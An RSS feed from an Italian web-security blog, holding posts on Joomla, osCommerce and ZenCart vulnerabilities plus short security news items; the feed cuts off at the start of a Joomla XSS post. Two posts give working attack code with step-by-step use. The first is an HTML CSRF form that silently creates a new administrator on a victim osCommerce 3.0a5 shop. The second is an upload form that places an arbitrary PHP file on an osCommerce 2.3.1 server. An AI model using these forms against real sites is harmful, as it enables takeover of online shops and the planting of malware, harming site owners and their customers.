<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Capn3m0 WebSecurity &#187; exploit</title>
	<atom:link href="http://www.capn3m0.org/tag/exploit/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.capn3m0.org</link>
	<description>...hacking, security, wifi and more...</description>
	<lastBuildDate>Tue, 07 Feb 2012 20:08:15 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Joomla 1.7.3 e 1.5.25: Security Release!</title>
		<link>http://www.capn3m0.org/joomla-1.7.3-e-1.5.25-security-release.html</link>
		<comments>http://www.capn3m0.org/joomla-1.7.3-e-1.5.25-security-release.html#comments</comments>
		<pubDate>Mon, 14 Nov 2011 11:01:57 +0000</pubDate>
		<dc:creator>FabriSS</dc:creator>
				<category><![CDATA[Web&Cms]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[joomla 1.5]]></category>
		<category><![CDATA[joomla 1.7]]></category>
		<category><![CDATA[Joomla upgrade]]></category>
		<category><![CDATA[secunia.com]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=3820</guid>
		<description><![CDATA[In data odierna importanti novità in ambiente Joomla: sono stati rilasciati due aggiornamenti di sicurezza, rispettivamente per la famiglia 1.5 che ora prevede la versione 1.5.25 e la famiglia 1.7 arrivata alla versione 1.7.3. Le due release vanno a fixare dei bug di sicurezza che permettevano il cambio della password di amministrazione, come illustrato nel [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2010/10/&lt;strong&gt;&lt;strong&gt;joomla&lt;/strong&gt;-300x205.png" rel="lightbox[3820]" title="Joomla 1.7.3 e 1.5.25: Security Release!"><img class="alignleft size-thumbnail wp-image-1051" src="http://www.capn3m0.org/wp-content/uploads/2010/10/joomla-300x205-150x150.png" alt="Joomla 1.7.3 e 1.5.25: Security Release!"  title="Joomla 1.7.3 e 1.5.25: Security Release! pics" /></a>In data odierna importanti novità in ambiente <span style="text-decoration: underline;">Joomla</span>: sono stati rilasciati due aggiornamenti di sicurezza, rispettivamente per la famiglia 1.5 che ora prevede la versione <strong>1.5.25</strong> e la famiglia 1.7 arrivata alla versione <strong>1.7.3</strong>.</p>
<p>Le due release vanno a fixare dei bug di sicurezza che permettevano il cambio della password di amministrazione, come illustrato nel <a title="Blog Ufficiale di &lt;a href=" href="http://developer.&lt;a href=" target="_blank">blog ufficiale.</a></p>
<p>Queste vulnerabilità si vanno a sommare a quelle riscontrate su numerosi componenti aggiuntivi nel mese di Ottobre 2011 ed illustrate da <a title="Secunia Advisory SA46459" href="http://secunia.com/advisories/46459/" target="_blank">Secunia.com</a>. Tali bug permettono di passare <span>input alla index.php, tramite il parametro &#8220;file&#8221;, includendo file non verificati o, tramite il parametro POST &#8220;url_options&#8221;, si possono</span><span> creare file cookie con PHP arbitrario contenuto nella webroot.</span></p>
<p>Il consiglio per tutti gli utilizzatori di questo CMS in tutte le versioni possibili è solo uno: <strong>AGGIORNATE!!</strong></p>
<p>Di seguito il link per effettuare il download direttamente dal sito ufficiale degli sviluppatori:</p>
<p><a href="http://www.joomla.org/download.html" target="_blank">http://www.joomla.org/download.html</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/joomla-1.7.3-e-1.5.25-security-release.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; osCommerce v3.0a5 Multiple Vulnerabilities</title>
		<link>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html</link>
		<comments>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html#comments</comments>
		<pubDate>Fri, 20 May 2011 19:14:17 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack oscommerce]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[osCommerce 3]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[xsrf]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2725</guid>
		<description><![CDATA[Seguendo la scia di notizie degli ultimi tempi che han portato alla luce gravi vulnerabilità per le ultime versioni di OsCommerce (2.3.1) e ZenCart (1.3.9h) non poteva mancare all&#8217;appello anche l&#8217;ultimissima alpha release osCommerce 3.0.a5. Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/osCommerceLogo.jpg" rel="lightbox[2725]" title="osCommerceLogo"><img class="alignleft size-thumbnail wp-image-2726" title="osCommerceLogo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/osCommerceLogo-150x137.jpg" alt="[EXPLOIT]   osCommerce v3.0a5 Multiple Vulnerabilities" width="150" height="137" /></a>Seguendo la scia di notizie degli ultimi tempi che han portato alla luce <strong>gravi vulnerabilità</strong> per le ultime versioni di <strong><a href="http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html">OsCommerce (2.3.1)</a> e<a href="http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html"> ZenCart (1.3.9h)</a></strong> non poteva mancare all&#8217;appello anche l&#8217;ultimissima alpha release <strong>osCommerce 3.0.a5</strong>.</p>
<p>Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente &#8220;stabili&#8221; sono state bucate da molteplici vulnerabilità. Nella release specifica, che ripetiamo si tratta di una alpha, sono state individuate vulnerabilità di tipo <strong>Xss, Full Path Disclosure, Local File Inclusion e XSRF</strong>.</p>
<p>La<strong> Full Path Disclosure</strong> consiste nell&#8217;interrogare alcuni file del Template di OsCommerce che, andando in errore,<strong> mostrano a video la full path</strong> della loro posizione sul Server. Con questa sola informazione si può fare poco ma, anche in questo caso, se unita ad altri tipi di attacchi diventa una utile informazione. La <strong>XSS permette di iniettare codice JavaScript </strong>sfruttando una falla del file &#8220;products.php&#8221; mentre la <strong>Local File Inclusion</strong> consente di richiamare file presenti sul Server sfruttando la procedura di disinstallazione moduli del Cms che non verifica opportunamente i parametri passati e permette di accettare in input qualsiasi path raggiungibile.</p>
<p>Anche in questo caso c&#8217;è una <strong>falla più grave </strong>delle altre e a mio avviso è la <strong>XSRF</strong> che permette di inviare comandi all&#8217;applicativo senza che questi vengano verificati in alcun modo. Nel caso specifico <strong>sarà possibile creare un nuovo Admin sull&#8217;OsCommerce</strong>.</p>
<p>Basterà creare una pagina &#8220;.html&#8221; contenente il seguente codice:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">&lt;html&gt;
&lt;body&gt;
&lt;form action=&quot;http://&lt;sito vittima&gt;/admin/index.php?administrators&amp;action=save&quot; method=&quot;post&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;user_name&quot; value=&quot;&lt;nomeutente&gt;&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;user_password&quot; value=&quot;&lt;password&gt;&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;modules[]&quot; value=&quot;0?&gt;
&lt;input type=&quot;hidden&quot; name=&quot;subaction&quot; value=&quot;confirm&quot;/&gt;
&lt;input type=&quot;submit&quot; value=&quot;Save&quot;&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</pre></div></div>

<p>Ovviamente dovrete sostituire i seguenti parametri:</p>
<p><strong>&lt;sito vittima</strong>&gt; con il dominio del sito in cui si vuole creare l&#8217;account</p>
<p><strong>&lt;nomeutente&gt;</strong> con il nome utente del nuovo Admin</p>
<p><strong>&lt;password&gt;</strong> con la password da associare al nuovo Admin</p>
<p>Una volta creata la pagina richiamatela dal vostro Browser e cliccate su &#8220;Save&#8221;.</p>
<p>Se tutto è andato a buon fine accedendo all&#8217;url:</p>
<p><cite>http://&lt;sito vittima&gt;/admin/</cite></p>
<p><strong>potrete loggarvi come Admin</strong> con i dati appena inseriti.</p>
<p>Per informazioni dettagliate vi rimando al link del <strong>Dr. Alberto Fontanella</strong> autore dell’articolo.</p>
<p><a href="http://ictsec.wordpress.com/exploits/oscommerce-v3-0a5-multiple-vulnerabilities/" target="_blank">osCommerce v3.0a5 [ Multiple Vulnerabilities ]</a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; ZenCart 1.3.9h Multiple Vulnerabilities</title>
		<link>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html</link>
		<comments>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html#comments</comments>
		<pubDate>Fri, 20 May 2011 17:37:19 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[Arbitrary File Upload]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack zencart]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[zencart]]></category>
		<category><![CDATA[zencart 1.3.9h]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2723</guid>
		<description><![CDATA[E&#8217; ormai consuetudine che dopo l&#8217;individuazione di una nuova falla per OsCommerce a catena vengano individuate le stesse (o quasi) falle per ZenCart, altro noto Cms derivato dallo stesso OsCommerce. La versione vulnerabile è l&#8217;ultima disponibile ossia la 1.3.9h e presenta vulnerabilità di vario tipo: Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/zencart_logo.jpg" rel="lightbox[2723]" title="zencart_logo"><img class="alignleft size-thumbnail wp-image-2724" title="zencart_logo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/zencart_logo-150x88.jpg" alt="[EXPLOIT]   ZenCart 1.3.9h Multiple Vulnerabilities" width="150" height="88" /></a>E&#8217; ormai consuetudine che dopo l&#8217;individuazione di una <a href="http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html"><strong>nuova falla</strong></a> per OsCommerce a catena vengano individuate le stesse (o quasi) falle per<a href="http://www.zen-cart.com/" target="_blank"> <strong>ZenCart</strong></a>, altro noto Cms derivato dallo stesso OsCommerce.</p>
<p>La versione vulnerabile è l&#8217;ultima disponibile ossia la <strong>1.3.9h</strong> e presenta vulnerabilità di vario tipo: <strong>Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File Upload</strong>.</p>
<p>La vulnerabilità <strong>Full Path Disclosure</strong> permette, se la gestione degli errori è configurata per mostrarli a video, di<strong> conoscere la path assoluta</strong> dell&#8217;applicativo. Di per sé non è una falla che consente di effettuare alcun tipo di azione ma l&#8217;informazione che si ottiene potrebbe essere utile se unita ad attacchi che vanno a scrivere sul FileSystem o similari. Le due <strong>XSS</strong>, invece, non affliggono l&#8217;attuale 1.3.9h ma <strong>tutte le versioni precedenti</strong>. Le vulnerabilità sono localizzate nel campo &#8220;Quantità&#8221; del carrello che permette l<strong>&#8216;injection di codice XSS</strong> e nell&#8217;Area Amministrativa &#8220;Location/Taxes&#8221;. Per quest&#8217;ultima, quindi, si presume che si abbia già l&#8217;accesso Admin.</p>
<p>L&#8217;ultima vulnerabilità, la più grave, riguarda invece il <strong>componente Banner (banner_manager.php)</strong> che, così come per OsCommerce, permette di <strong>effettuare l&#8217;upload di files</strong> che verranno salvati nella cartella &#8220;images&#8221;.</p>
<p>Per informazioni dettagliate vi rimando al link del <strong>Dr. Alberto Fontanella</strong> autore dell&#8217;articolo.</p>
<p><a href="http://ictsec.wordpress.com/exploits/zen-cart-v-1-3-9h-multiple-vulnerabilities/" target="_blank">Zen Cart &lt;= v.1.3.9h [ Multiple Vulnerabilities ]</a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; OsCommerce 2.3.1 Remote File Upload Vulnerability</title>
		<link>http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html</link>
		<comments>http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html#comments</comments>
		<pubDate>Thu, 19 May 2011 18:31:22 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[authentication bypass]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack oscommerce]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[osCommerce 2.3.1]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[remote file upload]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2630</guid>
		<description><![CDATA[Come ricordete l&#8217;ultima volta che venne nominato l&#8217;ecommerce OsCommerce su questo sito era per segnalare una grave vulnerabilità presente in tutte le versioni. La falla era presente anche in diverse versioni di ZenCart in quanto derivato da OsCommerce stesso. A distanza di 2 anni i programmatori, dopo una lunga latitanza, hanno rilasciato 2 nuove versioni: [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/oscommerce_logo.gif" rel="lightbox[2630]" title="oscommerce_logo"><img class="alignleft size-thumbnail wp-image-2631" title="oscommerce_logo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/oscommerce_logo-150x114.gif" alt="[EXPLOIT]   OsCommerce 2.3.1 Remote File Upload Vulnerability" width="150" height="114" /></a>Come ricordete l&#8217;ultima volta che venne nominato l&#8217;ecommerce <a href="http://oscommerce.com/" target="_blank"><strong>OsCommerce</strong></a> su questo sito era per <a href="http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html">segnalare</a> una <strong>grave vulnerabilità</strong> presente in tutte le versioni. La falla era presente anche in diverse versioni di ZenCart in quanto derivato da OsCommerce stesso.</p>
<p>A distanza di 2 anni i programmatori, dopo una lunga latitanza, hanno rilasciato <strong>2 nuove versioni</strong>: la <strong>2.3.1</strong> e la nuova <strong>3.0.1</strong>. Il rilascio delle due nuove versioni non ha avuto molto risalto e tra gli utilizzatori di questo applicativo pochi hanno provveduto ad aggiornare.</p>
<p>Lo scorso 14 Maggio, però, è stata scoperta una <strong>nuova falla</strong> (purtoppo molto simile alla precedente) che permette l&#8217;upload di files nella cartella &#8220;/images&#8221; senza dover utilizzare tecniche particolari o rubare i dati di Amministratore.</p>
<p><span id="more-2630"></span>Come riportato <a href="http://www.bugsearch.net/it/11838/oscommerce-231-bannermanagerphp-remote-file-upload-vulnerability.html" target="_blank"><strong>qui</strong></a> il componente Banner (<strong>banner_manager.php</strong>) della nuova versione 2.3.1 di OsCommerce soffre di una vulnerabilità che <strong>consente di uploadare files</strong> sul sito &#8220;vittima&#8221; semplicemente creando sul proprio PC una pagina html con il seguente codice:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">&lt;form name=”new_banner” action=”http://site/path/admin/banner_manager.php/login.php?action=insert” method=”post” enctype=”multipart/form-data”&gt;&lt;br&gt;
&lt;input type=”file” name=”banners_image”&gt;&lt;br&gt;
&lt;input name=”submit” value=” Save ” type=”submit”&gt;&lt;/form&gt;</pre></div></div>

<p>Basterà sostituire a &#8220;<strong>site/path</strong>&#8221; il dominio e l&#8217;eventuale sottocartella del sito basato su questo Cms e salvare il file in formato &#8220;.html&#8221;.</p>
<p>Apritelo con il vostro Browser e vi troverete davanti un form di upload file.</p>
<p>Scegliete il vostro file e fate l&#8217;upload; una volta terminata l&#8217;operazione potrete interrogare il file richiamando l&#8217;url nel seguente modo:</p>
<p>http://<strong>site/path</strong>/images/&lt;fileinviato.php&gt;</p>
<p>Analizzando alcuni casi di utilizzo di questa vulnerabilità ho riscontrato casi di <strong>iniezione di virus/malware</strong> come <a href="http://www.capn3m0.org/hack-cannot-redeclare-security_update.html">già riscontrato</a> sempre nel 2009.</p>
<p>Non appena avrò maggiori informazioni provvederò a tenervi aggiornati.</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Rubati 11 milioni di dollari on line da hacker cinesi</title>
		<link>http://www.capn3m0.org/rubati-11-milioni-di-dollari-on-line-da-hacker-cinesi.html</link>
		<comments>http://www.capn3m0.org/rubati-11-milioni-di-dollari-on-line-da-hacker-cinesi.html#comments</comments>
		<pubDate>Wed, 04 May 2011 14:10:12 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hacker cinesi]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2360</guid>
		<description><![CDATA[Imprese statunitensi prese di mira dai cyberpirati cinesi con una intensa attività di phishing. Nell’ultimo anno messi a segno 20 colpi.]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/china-hacker.jpg" rel="lightbox[2360]" title="china-hacker"><img class="alignleft size-thumbnail wp-image-2363" title="china-hacker" src="http://www.capn3m0.org/wp-content/uploads/2011/05/china-hacker-150x150.jpg" alt="Rubati 11 milioni di dollari on line da hacker cinesi" width="150" height="150" /></a>Imprese statunitensi prese di mira dai cyberpirati cinesi con una intensa attività di phishing. Nell’ultimo anno messi a segno 20 colpi.</p>
<p>Continue reading here:<br />
<a title="Rubati 11 milioni di dollari da hacker cinesi a conti correnti online di aziende" href="http://www.webmasterpoint.org/news/rubati-11-milioni-di-dollari-da-hacker-cinesi-a-conti-correnti-online-di-aziende_p40607.html" target="_blank">Rubati 11 milioni di dollari da hacker cinesi a conti correnti online di aziende</a></p>
<p>Source: <a title="Il punto di riferimento dei professionisti ICT" href="http://www.webmasterpoint.org/news/" target="_blank">WebMasterPoint.org NEWS</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/rubati-11-milioni-di-dollari-on-line-da-hacker-cinesi.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft, patch day da record</title>
		<link>http://www.capn3m0.org/microsoft-patch-day-da-record.html</link>
		<comments>http://www.capn3m0.org/microsoft-patch-day-da-record.html#comments</comments>
		<pubDate>Wed, 13 Apr 2011 05:00:23 +0000</pubDate>
		<dc:creator>Tacu</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Varie]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[patch-day]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/microsoft-patch-day-da-record.html</guid>
		<description><![CDATA[Il patch day di aprile porta all'utenza Microsoft un aggiornamento da record: 17 patch per 64 vulnerabilità. ]]></description>
			<content:encoded><![CDATA[<p>Il patch day di aprile porta all&#8217;utenza Microsoft un aggiornamento da record: 17 patch per 64 vulnerabilità.</p>
<p>Read the original:<br />
<a title="Microsoft, patch day da record" href="http://feedproxy.google.com/~r/webnewsit/~3/rSr9GqNlRUk/" target="_blank">Microsoft, patch day da record</a></p>
<p>Source: <a title="Informazione dal mondo digitale" href="http://www.webnews.it" target="_blank">Webnews</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/microsoft-patch-day-da-record.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>XCode SQL Injection Scanner</title>
		<link>http://www.capn3m0.org/xcode-sql-injection-scanner.html</link>
		<comments>http://www.capn3m0.org/xcode-sql-injection-scanner.html#comments</comments>
		<pubDate>Tue, 15 Mar 2011 18:41:57 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[xcode]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=1903</guid>
		<description><![CDATA[&#160; Breve videoguida all&#8217;utilizzo di XCode SQL Injection Scanner che permette di filtrare tramite Dork su Google eventuali siti vulnerabili a Sql Injection e, successivamente, lancia degli attacchi standard per verificare quali effettivamente risultano vulnerabili. Un buon tool che permette di risparmiare tempo durante i pentest! http://www.youtube.com/v/9d1bL5dN_KY?f=videos&#38;app=youtube_gdata Read the rest here: XCode SQL Injection Scanner]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<p>Breve videoguida all&#8217;utilizzo di XCode SQL Injection Scanner che permette di filtrare tramite Dork su Google eventuali siti vulnerabili a Sql Injection e, successivamente, lancia degli attacchi standard per verificare quali effettivamente risultano vulnerabili.</p>
<p>Un buon tool che permette di risparmiare tempo durante i pentest! <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="XCode SQL Injection Scanner" class='wp-smiley' title="XCode SQL Injection Scanner pics" /> </p>
<p><object width="370" height="305" type="application/x-shockwave-flash" data="http://www.youtube.com/v/9d1bL5dN_KY?f=videos&amp;app=youtube_gdata"><a href="http://www.youtube.com/v/9d1bL5dN_KY?f=videos&amp;app=youtube_gdata">http://www.youtube.com/v/9d1bL5dN_KY?f=videos&amp;app=youtube_gdata</a></object></p>
<p>Read the rest here:<br />
<a title="XCode SQL Injection Scanner" href="http://www.youtube.com/watch?v=9d1bL5dN_KY&amp;feature=youtube_gdata" target="_blank">XCode SQL Injection Scanner</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/xcode-sql-injection-scanner.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano</title>
		<link>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html</link>
		<comments>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html#comments</comments>
		<pubDate>Mon, 01 Nov 2010 20:36:05 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack mail]]></category>
		<category><![CDATA[provider]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sicurezza informatica]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=808</guid>
		<description><![CDATA[ Ieri (28/10/2010) il programma televisivo Le Iene ha pubblicato un servizio dimostrativo sulla vulnerabilità dei sistemi informatici Italiani prendendo di mira un provider di caselle eMail gratuite. Il servizio dimostra come sia possibile accedere (con una piccola sostituzione di parametri) alla casella eMail di un estraneo e prenderne il completo controllo. ]]></description>
			<content:encoded><![CDATA[<p>Il 28/10/2010 il programma televisivo <strong>Le Iene</strong> ha pubblicato un servizio dimostrativo sulla vulnerabilità dei sistemi informatici Italiani prendendo di mira un provider di caselle eMail gratuite. Il servizio dimostra come sia possibile accedere (con una piccola sostituzione di parametri) alla casella eMail di un estraneo e prenderne il completo controllo.</p>
<p>
<object id="veohFlashPlayer" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="450" height="341" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="name" value="veohFlashPlayer" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.3.1024&amp;permalinkId=v205465564BHCqS5a&amp;player=videodetailsembedded&amp;videoAutoPlay=0&amp;id=anonymous" /><param name="allowfullscreen" value="true" /><embed id="veohFlashPlayer" type="application/x-shockwave-flash" width="450" height="341" src="http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.3.1024&amp;permalinkId=v205465564BHCqS5a&amp;player=videodetailsembedded&amp;videoAutoPlay=0&amp;id=anonymous" allowscriptaccess="always" allowfullscreen="true" name="veohFlashPlayer"></embed></object>
</p>
<p>Read the original here:<br />
 <a title="Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano" href="http://feedproxy.google.com/~r/OverSecurity/~3/9x5bVt5F7CY/" target="_blank">Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Neuromancer &#8211; Hacking sites with Joomla (Universidade USP)</title>
		<link>http://www.capn3m0.org/%e3%80%8cneuromancer%e3%80%8dhacking-sites-with-joomla-universidade-usp.html</link>
		<comments>http://www.capn3m0.org/%e3%80%8cneuromancer%e3%80%8dhacking-sites-with-joomla-universidade-usp.html#comments</comments>
		<pubDate>Sun, 31 Oct 2010 01:02:54 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[defacement]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[joomla 1.5]]></category>
		<category><![CDATA[neuromancer]]></category>
		<category><![CDATA[security exploit]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[universidade]]></category>
		<category><![CDATA[usp]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=524</guid>
		<description><![CDATA[Video Tutorial dell&#8217;utilizzo della nota (e vecchia) vulnerabilità Joomla 1.5.x Remote Admin Password Change Original post: 「Neuromancer」Hacking sites with Joomla (Universidade USP)]]></description>
			<content:encoded><![CDATA[<p>Video Tutorial dell&#8217;utilizzo della nota (e vecchia) vulnerabilità <a href="http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html" target="_self"><strong>Joomla 1.5.x Remote Admin Password Change</strong></a></p>
<p><object width="370" height="305" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="data" value="http://www.youtube.com/v/487RCxcT_og?f=videos&amp;app=youtube_gdata" /><param name="src" value="http://www.youtube.com/v/487RCxcT_og?f=videos&amp;app=youtube_gdata" /><embed width="370" height="305" type="application/x-shockwave-flash" src="http://www.youtube.com/v/487RCxcT_og?f=videos&amp;app=youtube_gdata" data="http://www.youtube.com/v/487RCxcT_og?f=videos&amp;app=youtube_gdata" /></object></p>
<p><img src="http://www.capn3m0.org/wp-content/uploads/2010/10/6078cffcdefault.jpg" alt="Neuromancer   Hacking sites with Joomla (Universidade USP)"  title="Neuromancer   Hacking sites with Joomla (Universidade USP) pics" /></p>
<p>Original post:<br />
<a title="「Neuromancer」Hacking sites with Joomla (Universidade USP)" href="http://www.youtube.com/watch?v=487RCxcT_og&amp;feature=youtube_gdata" target="_blank">「Neuromancer」Hacking sites with Joomla (Universidade USP)</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/%e3%80%8cneuromancer%e3%80%8dhacking-sites-with-joomla-universidade-usp.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; Joomla all versions XSS vulnerability</title>
		<link>http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html</link>
		<comments>http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html#comments</comments>
		<pubDate>Sat, 09 Oct 2010 16:42:38 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[vulnerability]]></category>
